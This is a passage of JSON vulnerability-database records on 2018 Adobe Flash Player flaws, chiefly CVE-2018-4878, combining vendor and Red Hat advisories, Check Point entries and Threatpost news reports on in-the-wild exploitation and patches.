3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-01T00:00:00", "type": "adobe", "title": "APSA18-01 Security Advisory for Adobe Flash Player", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2018-02-08T00:00:00", "id": "APSA18-01", "href": "https://helpx.adobe.com/security/products/flash-player/apsa18-01.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-21T17:05:57", "description": "Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address an [important]() out-of-bounds read vulnerability that could lead to information exposure. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-09T00:00:00", "type": "adobe", "title": "APSB18-01 Security updates available for Adobe Flash Player", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2018-01-09T00:00:00", "id": "APSB18-01", "href": "https://helpx.adobe.com/security/products/flash-player/apsb18-01.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhatcve": [{"lastseen": "2022-07-09T16:39:14", "description": "A use-after-free vulnerability was discovered in Adobe Flash Player before 28.0.0.161. This vulnerability occurs due to a dangling pointer in the Primetime SDK related to media player's quality of service functionality. A successful attack can lead to arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-06T20:19:59", "type": "redhatcve", "title": "CVE-2018-4877", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "modified": "2022-07-09T15:55:29", "id": "RH:CVE-2018-4877", "href": "https://access.redhat.com/security/cve/cve-2018-4877", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-03T18:16:52", "description": "A use-after-free vulnerability was discovered in Adobe Flash Player before 28.0.0.161. This vulnerability occurs due to a dangling pointer in the Primetime SDK related to media player handling of listener objects. A successful attack can lead to arbitrary code execution. This was exploited in the wild in January and February 2018.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-05T11:19:42", "type": "redhatcve", "title": "CVE-2018-4878", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "modified": "2022-11-03T12:27:59", "id": "RH:CVE-2018-4878", "href": "https://access.redhat.com/security/cve/cve-2018-4878", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-06T20:31:46", "description": "Adobe Flash Player versions 28.0.0.161 and earlier have an exploitable use after free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-13T20:48:51", "type": "redhatcve", "title": "CVE-2018-4919", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919"], "modified": "2022-12-06T19:44:51", "id": "RH:CVE-2018-4919", "href": "https://access.redhat.com/security/cve/cve-2018-4919", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-06T20:31:45", "description": "Adobe Flash Player versions 28.0.0.161 and earlier have an exploitable type confusion vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-10-08T03:51:37", "type": "redhatcve", "title": "CVE-2018-4920", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4920"], "modified": "2022-12-06T19:44:59", "id": "RH:CVE-2018-4920", "href": "https://access.redhat.com/security/cve/cve-2018-4920", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-09T16:39:53", "description": "An Out-of-bounds Read issue was discovered in Adobe Flash Player before 28.0.0.137. This vulnerability occurs because of computation that reads data that is past the end of the target buffer. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-09T20:20:03", "type": "redhatcve", "title": "CVE-2018-4871", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2022-07-09T15:51:31", "id": "RH:CVE-2018-4871", "href": "https://access.redhat.com/security/cve/cve-2018-4871", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2019-03-14T05:46:49", "description": "The South Korean Computer Emergency Response Team issued a warning Wednesday of a new Adobe Flash Player zero-day spotted in the wild. The security bulletin warns that the attacks are focused on South Koreans and involve malicious Microsoft Word documents.\n\nAccording to the South Korean Computer Emergency Response Team (KR-CERT), the zero-day is believed to be a Flash SWF file embedded in MS Word documents. Impacted is Adobe\u2019s most recent Flash Player 28.0.0.137 and earlier.\n\n\u201cAn attacker may be able to convince a user to open a Microsoft Office document, web page, or spam mail containing a Flash file,\u201d according to a machine translation [of the KR-CERT security bulletin](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>).\n\nAdobe released a security advisory on Thursday acknowledging the vulnerability and attacks.\n\n> \u201cAdobe is aware of a report that an exploit for [CVE-2018-4878](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>) exists in the wild, and is being used in limited, targeted attacks against Windows users. Adobe will address this vulnerability in a release planned for the week of February 5,\u201d according the advisory.\n\nAdobe said the zero-day is exploiting the vulnerability CVE-2018-4878, a critical remote code execution bug. According to Adobe it was discovered in Adobe Flash Player before 28.0.0.137. Adobe credits KR-CERT for reporting this issue.\n\nAdobe said affected products are versions of Adobe Flash Player Desktop Runtime (Win/Mac), Adobe Flash Player for Google Chrome (Win/Mac/Linux/Chrome OS), Adobe Flash Player for Microsoft Edge and Internet Explorer 11 (Win 10 & 8.1) and Adobe Flash Player Desktop Runtime (Linux). A complete list is [available here](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>).\n\nSimon Choi, a security researcher with the South Korean security firm Hauri, claimed on Twitter that the zero-day vulnerability originated in North Korea and has been in use since mid-November 2017. Targeted are South Koreans researching online for information about North Korea.\n\n> Flash 0day vulnerability that made by North Korea used from mid-November 2017. They attacked South Koreans who mainly do research on North Korea. (no patch yet) [pic.twitter.com/bbjg1CKmHh](<https://t.co/bbjg1CKmHh>)\n> \n> \u2014 Simon Choi (@issuemakerslab) [February 1, 2018](<https://twitter.com/issuemakerslab/status/959006385550778369?ref_src=twsrc%5Etfw>)\n\nKR-CERT is recommending users refrain from using Microsoft\u2019s Internet Explorer browser and use Mozilla\u2019s Firefox browser instead.\n\nOn Thursday Adobe recommended:\n\n> \u201cBeginning with Flash Player 27, administrators have the ability to change Flash Player\u2019s behavior when running on Internet Explorer on Windows 7 and below by prompting the user before playing SWF content. For more details, see this administration guide. Administrators may also consider implementing Protected View for Office. Protected View opens a file marked as potentially unsafe in Read-only mode,\u201d Adobe said.\n", "cvss3": {}, "published": "2018-02-01T15:40:55", "type": "threatpost", "title": "Adobe Flash Player Zero-Day Spotted in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-4871", "CVE-2018-4878", "CVE-2019-0797"], "modified": "2018-02-01T15:40:55", "id": "THREATPOST:E1C629434DE943EAA7BD57B1F6EEA7E2", "href": "https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T05:27:42", "description": "Cybercriminals are leveraging a recently patched critical Adobe Flash Player vulnerability in a massive spam campaign targeting unpatched computers.\n\nAccording to cybersecurity firm Morphisec, cybercriminals are blasting spam messages that urge recipients to click a link to download a Word document. And when a victim opens the document and enables macros, malware attempts to exploit an Adobe Flash Player bug [(CVE-2018-4878](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>)) patched by Adobe [earlier this month.](<https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/>) Victims who fall for the ploy could ultimately hand over control of their systems to an attacker, according to researchers.\n\nAdobe classified the [bug as critical](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>), describing it as a use-after-free vulnerability impacting its Adobe Flash Player running on Windows 10, macOS, Linux and Chrome OS systems. The flaw was originally found by the South Korean Computer Emergency Response Team [on Jan. 31](<https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/>) and identified as a Flash SWF file embedded in Microsoft Word and Excel documents.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2018/02/06221417/Adobe_Vuln_Spam_CVE-2018-4878-in-the-wild.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/02/06221417/Adobe_Vuln_Spam_CVE-2018-4878-in-the-wild.png>)\n\nMichael Gorelik, chief technology officer and vice president of Research and Development at Morphisec, said that as part of the recent spam campaign victims were sent emails with short links to the malicious Word documents for download. He added, the malicious attachments were able to, for the most part, circumvent AV protection \u2013 showing a low detection ratio on VirusTotal.\n\n\u201cAfter downloading and opening the Word document, the attack exploits the Flash vulnerability 2018-4878 and opens a (command prompt) which is later remotely injected with a malicious shellcode that connects back to a malicious (C2) domain,\u201d Gorelik wrote in a technical write-up [outlining the attacks](<https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massive-malspam-campaign>). \u201cThe next step, the shellcode downloads a \u2018m.db\u2019 dll from the same domain, which is executed using regsvr32 process in order to be able to bypass whitelisting solutions.\u201d\n\nA regsvr32 (Microsoft Register Server) process is a command-line utility that is part of the Windows OS and is used for registering and unregistering DLLs and ActiveX controls within the context of the Windows Registry.\n\nResearchers said the analytics for the short links used in the email spam campaign shows the same pattern as a legitimate email campaigns, making them hard to detect. \u201cClickthroughs spike in the first couple of hours after emails are sent. Signature-based defenses, like antiviruses, cannot cope with this pace,\u201d Gorelik wrote.\n\nThe campaign tracked by Morphisec was \u201cjust a few hours long\u201d and targeted inboxes in the U.S. and Europe. \u201cThe documents were downloaded from the safe-storge[.]biz domain and went almost entirely undetected with an 1/67 detection ratio,\u201d according to Gorelik.\n\nAn Adobe spokesperson when asked to comment on the spam campaign said,\u201dthe majority of exploits are targeting software installations that are not up-to-date on the latest security updates. We always strongly recommend that users install security updates as soon as they are available.\u201d\n\nLooking forward, Gorelik said that he expects CVE-2018-4878 to cause more headaches in the years to come.\n\n\u201cAdobe released a patch early February, but it will take some companies weeks, months or even years to rollout the patch and cyber criminals keep developing new ways to exploit the vulnerability in this window,\u201d he said.\n", "cvss3": {}, "published": "2018-02-27T17:55:35", "type": "threatpost", "title": "Massive Spam Campaign Targets Unpatched Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-4878"], "modified": "2018-02-27T17:55:35", "id": "THREATPOST:BC14FD8D22AC2C22C164C5B8B0E36C05", "href": "https://threatpost.com/massive-malspam-campaign-targets-unpatched-systems/130136/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-11-03T07:11:30", "description": "Adobe on Wednesday released several unscheduled fixes for Flash Player, including a critical vulnerability that it said is being exploited in the wild.\n\nThe critical vulnerability, [CVE-2018-15982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982>), is a use-after-free flaw enabling arbitrary code-execution in Flash.\n\n\u201cAdobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS,\u201d Adobe said in its release. \u201cThese updates address one critical vulnerability in Adobe Flash Player and one important vulnerability in Adobe Flash Player installer. Successful exploitation could lead to arbitrary code-execution and privilege-escalation in the context of the current user respectively.\u201d\n\nThe flaw was discovered by Chenming Xu and Ed Miles of Gigamon ATR. Researchers on Wednesday also outlined the further technical details about the [exploit of the vulnerability](<https://threatpost.com/adobe-flash-zero-day-leveraged-via-office-docs-in-campaign/139635/>).\n\nImpacted is Adobe Flash Player Desktop Runtime, Adobe Flash Player for [Google Chrome](<https://threatpost.com/google-chrome-71-touts-43-fixes-fights-ad-abuse/139623/>); Adobe Flash Player for Microsoft Edge and Internet Explorer 11; all for versions 31.0.0.153 and earlier. Adobe Flash Player Installer versions 31.0.0.108 and earlier is also affected.\n\nUsers of these impacted products can update to version 32.0.0.101, according to Adobe. Users of Adobe Flash Player Installer can update to version 31.0.0.122.\n\nAdobe also patched an important-rated insecure library loading (via DLL hijacking) vulnerability, CVE-2018-15983, that could lead to privilege escalation via Adobe Flash.\n\nThis is only the latest exploit to hit Adobe Flash \u2013 earlier in June, a zero-day Flash [vulnerability](<https://threatpost.com/zero-day-flash-exploit-targeting-middle-east/132659/>) was is being exploited in the wild in targeted attacks against Windows users in the Middle East, according to researchers. Adobe dealt with another zero-day Flash vulnerability back in February, which was [exploited ](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/north-korean-hackers-allegedly-exploit-adobe-flash-player-vulnerability-cve-2018-4878-against-south-korean-targets>)by North Korean hackers.\n", "cvss3": {}, "published": "2018-12-05T15:18:09", "type": "threatpost", "title": "Adobe Patches Zero-Day Vulnerability in Flash Player", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-15982", "CVE-2018-15983", "CVE-2018-4878"], "modified": "2018-12-05T15:18:09", "id": "THREATPOST:EA5D6454E04EAFE2D10FDC5BD6D23F81", "href": "https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:52:38", "description": "A zero-day vulnerability is being exploited in the wild in targeted attacks against Windows users in the Middle East, researchers warned Thursday.\n\nThe Flash Player vulnerability (CVE-2018-5002), a stack-based buffer overflow bug that could enable arbitrary code execution, was patched earlier today by [Adobe](<https://threatpost.com/adobe-patches-critical-flash-player-bug-with-active-exploit/132595/>).\n\nThe vulnerability \u201callows for a maliciously crafted Flash object to execute code on victim computers, which enables an attacker to execute a range of payloads and actions,\u201d researchers from ICEBRG\u2019s Security Research Team, who was the first to report the discovered vuln, said in a Thursday [post](<https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack?utm_source=twitter&utm_medium=social&utm_term=&utm_content=&utm_campaign=blogpost-adobe0day>). It\u2019s particularly dangerous because all that needs to happen for the bug to be triggered is for the victim to open a malicious file.\n\nAccording to Adobe, CVE-2018-5002 was discovered by researchers from an array of organizations, including individuals from ICEBRG; 360 Threat Intelligence Center of 360 Enterprise Security Group; and Qihoo 360 Core Security. [ICEBRG ](<https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack?utm_source=twitter&utm_medium=social&utm_term=&utm_content=&utm_campaign=blogpost-adobe0day>)and [Qihoo 360 ](<http://blogs.360.cn/blog/cve-2018-5002-en/>)both came out with posts analyzing the new bug.\n\nThe exploit uses a carefully constructed Microsoft Office document to download and execute an Adobe Flash exploit to the victims\u2019 computers, according to ICEBRG researchers. The documents were sent primarily via email, according to Adobe.\n\nFirst, the user would open a weaponized Shockwave Flash file. From there, the file downloads and executes the exploit to achieve code execution on the system.\n\nThe file then executes shellcode, which calls out to the attackers command and control servers and enables the threat actor to further control the victim machine.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2018/06/07155857/flash-exploit-300x187.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/06/07155857/flash-exploit.png>)\u201cTypically, the final payload consists of shell code that provides backdoor functionality to the system or stages additional tools,\u201d ICEBRG researchers said.\n\nBoth ICEBRG and Qihoo 360 found evidence that suggested the exploit was targeting Qatari victims, based on geopolitical interests.\n\n\u201cThe weaponized document \u2026 is an Arabic language themed document that purports to inform the target of employee salary adjustments,\u201d ICEBRG researchers said. \u201cMost of the job titles included in the document are diplomatic in nature, specifically referring to salaries with positions referencing secretaries, ambassadors, diplomats, etc.\u201d\n\nMeanwhile, Qihoo researchers also said that \u201call clues show this is a typical APT attack.\u201d\n\n\u201cThe attacker developed sophisticated plans in the cloud and spent at least three months preparing for the attack,\u201d Qihoo researchers said. \u201cThe detailed phishing attack content was also tailored to the attack target.\u201d\n\nAdobe dealt with another zero-day Flash vulnerability back in February, which was [exploited ](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/north-korean-hackers-allegedly-exploit-adobe-flash-player-vulnerability-cve-2018-4878-against-south-korean-targets>)by North Korean hackers.\n\nThe company on Thursday also patched another critical vulnerability ([CVE-2018-4945](<https://nvd.nist.gov/vuln/detail/CVE-2018-4945>)) that enables arbitrary code execution; and two \u201cimportant\u201d vulnerabilities that could both lead to information disclosure, including one (CVE-2018-5000) Integer Overflow bug and an Out-of-bounds read glitch (CVE-2018-5001).\n\nMicrosoft did not respond to a request for multiple request for comment from Threatpost. The company posted a[ security update](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180014>) regarding the vulnerability on Thursday.\n\n\u201cIn order to protect themselves users should immediately upgrade their Adobe Flash and disable macros in Microsoft Office,\u201d Allan Liska, threat intelligence analyst at Recorded Future, told Threatpost.\n", "cvss3": {}, "published": "2018-06-07T20:05:52", "type": "threatpost", "title": "Zero-Day Flash Exploit Targeting Middle East", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-4878", "CVE-2018-4945", "CVE-2018-5000", "CVE-2018-5001", "CVE-2018-5002"], "modified": "2018-06-07T20:05:52", "id": "THREATPOST:DBD7145D5FE0AE34B1D653D25DF60AE8", "href": "https://threatpost.com/zero-day-flash-exploit-targeting-middle-east/132659/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-11-18T22:37:23", "description": "A use-after-free vulnerability exists in Adobe Flash Player. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-13T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Use After Free (APSB18-05: CVE-2018-4919)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919"], "modified": "2018-03-13T00:00:00", "id": "CPAI-2018-0176", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-18T22:37:23", "description": "A vulnerability exists in Adobe Flash Player. Successful exploitation of this vulnerability could allow a remote attacker to damage users system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-13T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Type Confusion (APSB18-05: CVE-2018-4920)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4920"], "modified": "2018-03-13T00:00:00", "id": "CPAI-2018-0175", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:31:01", "description": "A use-after-free vulnerability exists in Adobe Flash Player. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-06T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Use After Free (APSB18-03: CVE-2018-4877)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877"], "modified": "2018-02-06T00:00:00", "id": "CPAI-2018-0056", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T20:19:48", "description": "A remote code execution vulnerability exists in Adobe Flash Player. The vulnerability is due to a use-after-free error in Adobe Flash Player while handling a specially crafted SWF file. A remote attacker can exploit this vulnerability by enticing a target user to open a specially crafted file with an affected version of Flash Player.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-04T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Use After Free (APSB18-03: CVE-2018-4878)", "bulletinFamily": "info", 